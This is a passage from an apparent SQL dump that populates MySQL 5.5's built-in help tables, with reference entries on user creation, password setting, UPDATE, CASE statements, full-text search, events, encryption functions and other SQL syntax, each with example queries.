mysql_native_password;\nSET old_passwords = 0;\nSET PASSWORD FOR \'jeffrey\'@\'localhost\' = PASSWORD(\'mypass\');\n\n Changes to the account password using SET PASSWORD with PASSWORD()\n must be made with the old_passwords system variable set to the value\n required by the account\'s authentication plugin, so that PASSWORD()\n uses the appropriate password hashing method. Therefore, to use the\n mysql_old_password plugin instead, name that plugin in the CREATE\n USER statement and set old_passwords to 1 before using SET PASSWORD.\n\no To specify a password for an account at account-creation time, use\n IDENTIFIED BY with the literal cleartext password value:\n\nCREATE USER \'jeffrey\'@\'localhost\' IDENTIFIED BY \'mypass\';\n\n The server assigns the given password to the account but no\n authentication plugin. Clients must provide the password when they\n connect.\n\no To avoid specifying the cleartext password if you know its hash value\n (the value that PASSWORD() would return for the password), specify\n the hash value preceded by the keyword PASSWORD:\n\nCREATE USER \'jeffrey\'@\'localhost\'\nIDENTIFIED BY PASSWORD \'*90E462C37378CED12064BB3388827D2BA3A9B689\';\n\n The server assigns the given password to the account but no\n authentication plugin. Clients must provide the password when they\n connect.\n\no To enable the user to connect with no password, include no IDENTIFIED\n BY clause:\n\nCREATE USER \'jeffrey\'@\'localhost\';\n\n The server assigns no authentication plugin or password to the\n account. Clients must provide no password when they connect. However,\n an account with no password is insecure. To avoid this, use SET\n PASSWORD to set the account password.\n\nFor additional information about setting passwords and authentication\nplugins, see\nhttp://dev.mysql.com/doc/refman/5.5/en/assigning-passwords.html, and\nhttp://dev.mysql.com/doc/refman/5.5/en/pluggable-authentication.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-user.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-user.html'),(79,'POINT',25,'Point(x,y)\n\nConstructs a Point using its coordinates.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(80,'CURRENT_USER',17,'Syntax:\nCURRENT_USER, CURRENT_USER()\n\nReturns the user name and host name combination for the MySQL account\nthat the server used to authenticate the current client. This account\ndetermines your access privileges. The return value is a string in the\nutf8 character set.\n\nThe value of CURRENT_USER() can differ from the value of USER().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(81,'LCASE',38,'Syntax:\nLCASE(str)\n\nLCASE() is a synonym for LOWER().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(82,'<=',20,'Syntax:\n<=\n\nLess than or equal:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 0.1 <= 2;\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(83,'SHOW PROFILES',27,'Syntax:\nSHOW PROFILES\n\nThe SHOW PROFILES statement, together with SHOW PROFILE, displays\nprofiling information that indicates resource usage for statements\nexecuted during the course of the current session. For more\ninformation, see [HELP SHOW PROFILE].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-profiles.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-profiles.html'),(84,'UPDATE',28,'Syntax:\nSingle-table syntax:\n\nUPDATE [LOW_PRIORITY] [IGNORE] table_reference\n SET col_name1={expr1|DEFAULT} [, col_name2={expr2|DEFAULT}] ...\n [WHERE where_condition]\n [ORDER BY ...]\n [LIMIT row_count]\n\nMultiple-table syntax:\n\nUPDATE [LOW_PRIORITY] [IGNORE] table_references\n SET col_name1={expr1|DEFAULT} [, col_name2={expr2|DEFAULT}] ...\n [WHERE where_condition]\n\nFor the single-table syntax, the UPDATE statement updates columns of\nexisting rows in the named table with new values. The SET clause\nindicates which columns to modify and the values they should be given.\nEach value can be given as an expression, or the keyword DEFAULT to set\na column explicitly to its default value. The WHERE clause, if given,\nspecifies the conditions that identify which rows to update. With no\nWHERE clause, all rows are updated. If the ORDER BY clause is\nspecified, the rows are updated in the order that is specified. The\nLIMIT clause places a limit on the number of rows that can be updated.\n\nFor the multiple-table syntax, UPDATE updates rows in each table named\nin table_references that satisfy the conditions. Each matching row is\nupdated once, even if it matches the conditions multiple times. For\nmultiple-table syntax, ORDER BY and LIMIT cannot be used.\n\nwhere_condition is an expression that evaluates to true for each row to\nbe updated. For expression syntax, see\nhttp://dev.mysql.com/doc/refman/5.5/en/expressions.html.\n\ntable_references and where_condition are specified as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/select.html.\n\nYou need the UPDATE privilege only for columns referenced in an UPDATE\nthat are actually updated. You need only the SELECT privilege for any\ncolumns that are read but not modified.\n\nThe UPDATE statement supports the following modifiers:\n\no With the LOW_PRIORITY keyword, execution of the UPDATE is delayed\n until no other clients are reading from the table. This affects only\n storage engines that use only table-level locking (such as MyISAM,\n MEMORY, and MERGE).\n\no With the IGNORE keyword, the update statement does not abort even if\n errors occur during the update. Rows for which duplicate-key\n conflicts occur on a unique key value are not updated. Rows updated\n to values that would cause data conversion errors are updated to the\n closest valid values instead.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/update.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/update.html'),(85,'IS NOT NULL',20,'Syntax:\nIS NOT NULL\n\nTests whether a value is not NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 1 IS NOT NULL, 0 IS NOT NULL, NULL IS NOT NULL;\n -> 1, 1, 0\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(86,'CASE STATEMENT',24,'Syntax:\nCASE case_value\n WHEN when_value THEN statement_list\n [WHEN when_value THEN statement_list] ...\n [ELSE statement_list]\nEND CASE\n\nOr:\n\nCASE\n WHEN search_condition THEN statement_list\n [WHEN search_condition THEN statement_list] ...\n [ELSE statement_list]\nEND CASE\n\nThe CASE statement for stored programs implements a complex conditional\nconstruct.\n\n*Note*: There is also a CASE expression, which differs from the CASE\nstatement described here. See\nhttp://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html. The\nCASE statement cannot have an ELSE NULL clause, and it is terminated\nwith END CASE instead of END.\n\nFor the first syntax, case_value is an expression. This value is\ncompared to the when_value expression in each WHEN clause until one of\nthem is equal. When an equal when_value is found, the corresponding\nTHEN clause statement_list executes. If no when_value is equal, the\nELSE clause statement_list executes, if there is one.\n\nThis syntax cannot be used to test for equality with NULL because NULL\n= NULL is false. See\nhttp://dev.mysql.com/doc/refman/5.5/en/working-with-null.html.\n\nFor the second syntax, each WHEN clause search_condition expression is\nevaluated until one is true, at which point its corresponding THEN\nclause statement_list executes. If no search_condition is equal, the\nELSE clause statement_list executes, if there is one.\n\nIf no when_value or search_condition matches the value tested and the\nCASE statement contains no ELSE clause, a Case not found for CASE\nstatement error results.\n\nEach statement_list consists of one or more SQL statements; an empty\nstatement_list is not permitted.\n\nTo handle situations where no value is matched by any WHEN clause, use\nan ELSE containing an empty BEGIN ... END block, as shown in this\nexample. (The indentation used here in the ELSE clause is for purposes\nof clarity only, and is not otherwise significant.)\n\nDELIMITER |\n\nCREATE PROCEDURE p()\n BEGIN\n DECLARE v INT DEFAULT 1;\n\n CASE v\n WHEN 2 THEN SELECT v;\n WHEN 3 THEN SELECT 0;\n ELSE\n BEGIN\n END;\n END CASE;\n END;\n |\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/case.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/case.html'),(87,'EXECUTE STATEMENT',8,'Syntax:\nEXECUTE stmt_name\n [USING @var_name [, @var_name] ...]\n\nAfter preparing a statement with PREPARE, you execute it with an\nEXECUTE statement that refers to the prepared statement name. If the\nprepared statement contains any parameter markers, you must supply a\nUSING clause that lists user variables containing the values to be\nbound to the parameters. Parameter values can be supplied only by user\nvariables, and the USING clause must name exactly as many variables as\nthe number of parameter markers in the statement.\n\nYou can execute a given prepared statement multiple times, passing\ndifferent variables to it or setting the variables to different values\nbefore each execution.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/execute.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/execute.html'),(88,'DROP INDEX',40,'Syntax:\nDROP [ONLINE|OFFLINE] INDEX index_name ON tbl_name\n\nDROP INDEX drops the index named index_name from the table tbl_name.\nThis statement is mapped to an ALTER TABLE statement to drop the index.\nSee [HELP ALTER TABLE].\n\nTo drop a primary key, the index name is always PRIMARY, which must be\nspecified as a quoted identifier because PRIMARY is a reserved word:\n\nDROP INDEX `PRIMARY` ON t;\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-index.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-index.html'),(89,'MATCH AGAINST',38,'Syntax:\nMATCH (col1,col2,...) AGAINST (expr [search_modifier])\n\nMySQL has support for full-text indexing and searching:\n\no A full-text index in MySQL is an index of type FULLTEXT.\n\no Full-text indexes can be used only with MyISAM tables. (In MySQL 5.6\n and up, they can also be used with InnoDB tables.) Full-text indexes\n can be created only for CHAR, VARCHAR, or TEXT columns.\n\no A FULLTEXT index definition can be given in the CREATE TABLE\n statement when a table is created, or added later using ALTER TABLE\n or CREATE INDEX.\n\no For large data sets, it is much faster to load your data into a table\n that has no FULLTEXT index and then create the index after that, than\n to load data into a table that has an existing FULLTEXT index.\n\nFull-text searching is performed using MATCH() ... AGAINST syntax.\nMATCH() takes a comma-separated list that names the columns to be\nsearched. AGAINST takes a string to search for, and an optional\nmodifier that indicates what type of search to perform. The search\nstring must be a string value that is constant during query evaluation.\nThis rules out, for example, a table column because that can differ for\neach row.\n\nThere are three types of full-text searches:\n\no A natural language search interprets the search string as a phrase in\n natural human language (a phrase in free text). There are no special\n operators. The stopword list applies. In addition, words that are\n present in 50% or more of the rows are considered common and do not\n match.\n\n Full-text searches are natural language searches if the IN NATURAL\n LANGUAGE MODE modifier is given or if no modifier is given. For more\n information, see\n http://dev.mysql.com/doc/refman/5.5/en/fulltext-natural-language.html\n .\n\no A boolean search interprets the search string using the rules of a\n special query language. The string contains the words to search for.\n It can also contain operators that specify requirements such that a\n word must be present or absent in matching rows, or that it should be\n weighted higher or lower than usual. Common words such as \"some\" or\n \"then\" are stopwords and do not match if present in the search\n string. The IN BOOLEAN MODE modifier specifies a boolean search. For\n more information, see\n http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html.\n\no A query expansion search is a modification of a natural language\n search. The search string is used to perform a natural language\n search. Then words from the most relevant rows returned by the search\n are added to the search string and the search is done again. The\n query returns the rows from the second search. The IN NATURAL\n LANGUAGE MODE WITH QUERY EXPANSION or WITH QUERY EXPANSION modifier\n specifies a query expansion search. For more information, see\n http://dev.mysql.com/doc/refman/5.5/en/fulltext-query-expansion.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/fulltext-search.html\n\n','mysql> SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\'\n -> IN NATURAL LANGUAGE MODE) AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\'\n -> IN NATURAL LANGUAGE MODE);\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rows in set (0.00 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/fulltext-search.html'),(90,'CREATE EVENT',40,'Syntax:\nCREATE\n [DEFINER = { user | CURRENT_USER }]\n EVENT\n [IF NOT EXISTS]\n event_name\n ON SCHEDULE schedule\n [ON COMPLETION [NOT] PRESERVE]\n [ENABLE | DISABLE | DISABLE ON SLAVE]\n [COMMENT \'comment\']\n DO event_body;\n\nschedule:\n AT timestamp [+ INTERVAL interval] ...\n | EVERY interval\n [STARTS timestamp [+ INTERVAL interval] ...]\n [ENDS timestamp [+ INTERVAL interval] ...]\n\ninterval:\n quantity {YEAR | QUARTER | MONTH | DAY | HOUR | MINUTE |\n WEEK | SECOND | YEAR_MONTH | DAY_HOUR | DAY_MINUTE |\n DAY_SECOND | HOUR_MINUTE | HOUR_SECOND | MINUTE_SECOND}\n\nThis statement creates and schedules a new event. The event will not\nrun unless the Event Scheduler is enabled. For information about\nchecking Event Scheduler status and enabling it if necessary, see\nhttp://dev.mysql.com/doc/refman/5.5/en/events-configuration.html.\n\nCREATE EVENT requires the EVENT privilege for the schema in which the\nevent is to be created. It might also require the SUPER privilege,\ndepending on the DEFINER value, as described later in this section.\n\nThe minimum requirements for a valid CREATE EVENT statement are as\nfollows:\n\no The keywords CREATE EVENT plus an event name, which uniquely\n identifies the event in a database schema.\n\no An ON SCHEDULE clause, which determines when and how often the event\n executes.\n\no A DO clause, which contains the SQL statement to be executed by an\n event.\n\nThis is an example of a minimal CREATE EVENT statement:\n\nCREATE EVENT myevent\n ON SCHEDULE AT CURRENT_TIMESTAMP + INTERVAL 1 HOUR\n DO\n UPDATE myschema.mytable SET mycol = mycol + 1;\n\nThe previous statement creates an event named myevent. This event\nexecutes once---one hour following its creation---by running an SQL\nstatement that increments the value of the myschema.mytable table\'s\nmycol column by 1.\n\nThe event_name must be a valid MySQL identifier with a maximum length\nof 64 characters. Event names are not case sensitive, so you cannot\nhave two events named myevent and MyEvent in the same schema. In\ngeneral, the rules governing event names are the same as those for\nnames of stored routines. See\nhttp://dev.mysql.com/doc/refman/5.5/en/identifiers.html.\n\nAn event is associated with a schema. If no schema is indicated as part\nof event_name, the default (current) schema is assumed. To create an\nevent in a specific schema, qualify the event name with a schema using\nschema_name.event_name syntax.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-event.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-event.html'),(91,'ABS',3,'Syntax:\nABS(X)\n\nReturns the absolute value of X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(92,'POLYFROMWKB',33,'PolyFromWKB(wkb[,srid]), PolygonFromWKB(wkb[,srid])\n\nConstructs a Polygon value using its WKB representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(93,'NOT LIKE',38,'Syntax:\nexpr NOT LIKE pat [ESCAPE \'escape_char\']\n\nThis is the same as NOT (expr LIKE pat [ESCAPE \'escape_char\']).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-comparison-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-comparison-functions.html'),(94,'SPACE',38,'Syntax:\nSPACE(N)\n\nReturns a string consisting of N space characters.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT SPACE(6);\n -> \' \'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(95,'MBR DEFINITION',7,'Its MBR (minimum bounding rectangle), or envelope. This is the bounding\ngeometry, formed by the minimum and maximum (X,Y) coordinates:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-class-geometry.html\n\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','http://dev.mysql.com/doc/refman/5.5/en/gis-class-geometry.html'),(96,'MAX',16,'Syntax:\nMAX([DISTINCT] expr)\n\nReturns the maximum value of expr. MAX() may take a string argument; in\nsuch cases, it returns the maximum string value. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-indexes.html. The DISTINCT\nkeyword can be used to find the maximum of the distinct values of expr,\nhowever, this produces the same result as omitting DISTINCT.\n\nMAX() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','mysql> SELECT student_name, MIN(test_score), MAX(test_score)\n -> FROM student\n -> GROUP BY student_name;\n','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(97,'GEOMETRYCOLLECTION',25,'GeometryCollection(g1,g2,...)\n\nConstructs a GeometryCollection.\n\nIf the argument contains a nonsupported geometry, the return value is\nNULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(98,'CREATE FUNCTION UDF',22,'Syntax:\nCREATE [AGGREGATE] FUNCTION function_name RETURNS {STRING|INTEGER|REAL|DECIMAL}\n SONAME shared_library_name\n\nA user-defined function (UDF) is a way to extend MySQL with a new\nfunction that works like a native (built-in) MySQL function such as\nABS() or CONCAT().\n\nfunction_name is the name that should be used in SQL statements to\ninvoke the function. The RETURNS clause indicates the type of the\nfunction\'s return value. DECIMAL is a legal value after RETURNS, but\ncurrently DECIMAL functions return string values and should be written\nlike STRING functions.\n\nshared_library_name is the base name of the shared object file that\ncontains the code that implements the function. The file must be\nlocated in the plugin directory. This directory is given by the value\nof the plugin_dir system variable. For more information, see\nhttp://dev.mysql.com/doc/refman/5.5/en/udf-compiling.html.\n\nTo create a function, you must have the INSERT privilege for the mysql\ndatabase. This is necessary because CREATE FUNCTION adds a row to the\nmysql.func system table that records the function\'s name, type, and\nshared library name. If you do not have this table, you should run the\nmysql_upgrade command to create it. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-upgrade.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html'),(99,'*',3,'Syntax:\n*\n\nMultiplication:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> out-of-range error\n','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(100,'TIMESTAMP',23,'TIMESTAMP\n\nA timestamp. The range is \'1970-01-01 00:00:01\' UTC to \'2038-01-19\n03:14:07\' UTC. TIMESTAMP values are stored as the number of seconds\nsince the epoch (\'1970-01-01 00:00:00\' UTC). A TIMESTAMP cannot\nrepresent the value \'1970-01-01 00:00:00\' because that is equivalent to\n0 seconds from the epoch and the value 0 is reserved for representing\n\'0000-00-00 00:00:00\', the \"zero\" TIMESTAMP value.\n\nUnless specified otherwise, the first TIMESTAMP column in a table is\ndefined to be automatically set to the date and time of the most recent\nmodification if not explicitly assigned a value. This makes TIMESTAMP\nuseful for recording the timestamp of an INSERT or UPDATE operation.\nYou can also set any TIMESTAMP column to the current date and time by\nassigning it a NULL value, unless it has been defined with the NULL\nattribute to permit NULL values. The automatic initialization and\nupdating to the current date and time can be specified using DEFAULT\nCURRENT_TIMESTAMP and ON UPDATE CURRENT_TIMESTAMP clauses, as described\nin\nhttp://dev.mysql.com/doc/refman/5.5/en/timestamp-initialization.html.\n\n*Note*: The TIMESTAMP format that was used prior to MySQL 4.1 is not\nsupported in MySQL 5.5; see MySQL 3.23, 4.0, 4.1 Reference Manual for\ninformation regarding the old format.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-type-overview.html'),(101,'DES_DECRYPT',12,'Syntax:\nDES_DECRYPT(crypt_str[,key_str])\n\nDecrypts a string encrypted with DES_ENCRYPT(). If an error occurs,\nthis function returns NULL.\n\nThis function works only if MySQL has been configured with SSL support.\nSee http://dev.mysql.com/doc/refman/5.5/en/ssl-connections.html.\n\nIf no key_str argument is given, DES_DECRYPT() examines the first byte\nof the encrypted string to determine the DES key number that was used\nto encrypt the original string, and then reads the key from the DES key\nfile to decrypt the message. For this to work, the user must have the\nSUPER privilege. The key file can be specified with the --des-key-file\nserver option.\n\nIf you pass this function a key_str argument, that string is used as\nthe key for decrypting the message.\n\nIf the crypt_str argument does not appear to be an encrypted string,\nMySQL returns the given crypt_str.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(102,'CACHE INDEX',27,'Syntax:\nCACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n [PARTITION (partition_list | ALL)]\n IN key_cache_name\n\ntbl_index_list:\n tbl_name [[INDEX|KEY] (index_name[, index_name] ...)]\n\npartition_list:\n partition_name[, partition_name][, ...]\n\nThe CACHE INDEX statement assigns table indexes to a specific key\ncache. It is used only for MyISAM tables. After the indexes have been\nassigned, they can be preloaded into the cache if desired with LOAD\nINDEX INTO CACHE.\n\nThe following statement assigns indexes from the tables t1, t2, and t3\nto the key cache named hot_cache:\n\nmysql> CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/cache-index.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/cache-index.html'),(103,'ENDPOINT',13,'EndPoint(ls)\n\nReturns the Point that is the endpoint of the LineString value ls.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html\n\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+-------------------------------------+\n| POINT(3 3) |\n+-------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html'),(104,'COMPRESS',12,'Syntax:\nCOMPRESS(string_to_compress)\n\nCompresses a string and returns the result as a binary string. This\nfunction requires MySQL to have been compiled with a compression\nlibrary such as zlib. Otherwise, the return value is always NULL. The\ncompressed string can be uncompressed with UNCOMPRESS().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELECT LENGTH(COMPRESS(\'\'));\n -> 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(105,'INSERT',28,'Syntax:\nINSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n {VALUES | VALUE} ({expr | DEFAULT},...),(...),...\n [ ON DUPLICATE KEY UPDATE\n col_name=expr\n [, col_name=expr] ... ]\n\nOr:\n\nINSERT [LOW_PRIORITY | DELAYED | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name\n SET col_name={expr | DEFAULT}, ...\n [ ON DUPLICATE KEY UPDATE\n col_name=expr\n [, col_name=expr] ... ]\n\nOr:\n\nINSERT [LOW_PRIORITY | HIGH_PRIORITY] [IGNORE]\n [INTO] tbl_name [(col_name,...)]\n SELECT ...\n [ ON DUPLICATE KEY UPDATE\n col_name=expr\n [, col_name=expr] ... ]\n\nINSERT inserts new rows into an existing table. The INSERT ... VALUES\nand INSERT ... SET forms of the statement insert rows based on\nexplicitly specified values. The INSERT ... SELECT form inserts rows\nselected from another table or tables. INSERT ... SELECT is discussed\nfurther in [HELP INSERT SELECT].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/insert.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/insert.html'),(106,'COUNT',16,'Syntax:\nCOUNT(expr)\n\nReturns a count of the number of non-NULL values of expr in the rows\nretrieved by a SELECT statement. The result is a BIGINT value.\n\nCOUNT() returns 0 if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;\n','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(107,'HANDLER',28,'Syntax:\nHANDLER tbl_name OPEN [ [AS] alias]\n\nHANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\n\nHANDLER tbl_name CLOSE\n\nThe HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for InnoDB and MyISAM tables.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/handler.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/handler.html'),(108,'MLINEFROMTEXT',4,'MLineFromText(wkt[,srid]), MultiLineStringFromText(wkt[,srid])\n\nConstructs a MultiLineString value using its WKT representation and\nSRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(109,'GEOMCOLLFROMWKB',33,'GeomCollFromWKB(wkb[,srid]), GeometryCollectionFromWKB(wkb[,srid])\n\nConstructs a GeometryCollection value using its WKB representation and\nSRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(110,'HELP_DATE',9,'This help information was generated from the MySQL 5.5 Reference Manual\non: 2015-09-18\n','',''),(111,'RENAME TABLE',40,'Syntax:\nRENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_name2] ...\n\nThis statement renames one or more tables.\n\nThe rename operation is done atomically, which means that no other\nsession can access any of the tables while the rename is running. For\nexample, if you have an existing table old_table, you can create\nanother table new_table that has the same structure but is empty, and\nthen replace the existing table with the empty one as follows (assuming\nthat backup_table does not already exist):\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/rename-table.html\n\n','CREATE TABLE new_table (...);\nRENAME TABLE old_table TO backup_table, new_table TO old_table;\n','http://dev.mysql.com/doc/refman/5.5/en/rename-table.html'),(112,'BOOLEAN',23,'BOOL, BOOLEAN\n\nThese types are synonyms for TINYINT(1). A value of zero is considered\nfalse. Nonzero values are considered true:\n\nmysql> SELECT IF(0, \'true\', \'false\');\n+------------------------+\n| IF(0, \'true\', \'false\') |\n+------------------------+\n| false |\n+------------------------+\n\nmysql> SELECT IF(1, \'true\', \'false\');\n+------------------------+\n| IF(1, \'true\', \'false\') |\n+------------------------+\n| true |\n+------------------------+\n\nmysql> SELECT IF(2, \'true\', \'false\');\n+------------------------+\n| IF(2, \'true\', \'false\') |\n+------------------------+\n| true |\n+------------------------+\n\nHowever, the values TRUE and FALSE are merely aliases for 1 and 0,\nrespectively, as shown here:\n\nmysql> SELECT IF(0 = FALSE, \'true\', \'false\');\n+--------------------------------+\n| IF(0 = FALSE, \'true\', \'false\') |\n+--------------------------------+\n| true |\n+--------------------------------+\n\nmysql> SELECT IF(1 = TRUE, \'true\', \'false\');\n+-------------------------------+\n| IF(1 = TRUE, \'true\', \'false\') |\n+-------------------------------+\n| true |\n+-------------------------------+\n\nmysql> SELECT IF(2 = TRUE, \'true\', \'false\');\n+-------------------------------+\n| IF(2 = TRUE, \'true\', \'false\') |\n+-------------------------------+\n| false |\n+-------------------------------+\n\nmysql> SELECT IF(2 = FALSE, \'true\', \'false\');\n+--------------------------------+\n| IF(2 = FALSE, \'true\', \'false\') |\n+--------------------------------+\n| false |\n+--------------------------------+\n\nThe last two statements display the results shown because 2 is equal to\nneither 1 nor 0.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(113,'DEFAULT',14,'Syntax:\nDEFAULT(col_name)\n\nReturns the default value for a table column. An error results if the\ncolumn has no default value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(114,'MOD',3,'Syntax:\nMOD(N,M), N % M, N MOD M\n\nModulo operation. Returns the remainder of N divided by M.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT MOD(234, 10);\n -> 4\nmysql> SELECT 253 % 7;\n -> 1\nmysql> SELECT MOD(29,9);\n -> 2\nmysql> SELECT 29 MOD 9;\n -> 2\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(115,'TINYTEXT',23,'TINYTEXT [CHARACTER SET charset_name] [COLLATE collation_name]\n\nA TEXT column with a maximum length of 255 (28 − 1) characters. The\neffective maximum length is less if the value contains multibyte\ncharacters. Each TINYTEXT value is stored using a 1-byte length prefix\nthat indicates the number of bytes in the value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(116,'OPTIMIZE TABLE',21,'Syntax:\nOPTIMIZE [NO_WRITE_TO_BINLOG | LOCAL] TABLE\n tbl_name [, tbl_name] ...\n\nReorganizes the physical storage of table data and associated index\ndata, to reduce storage 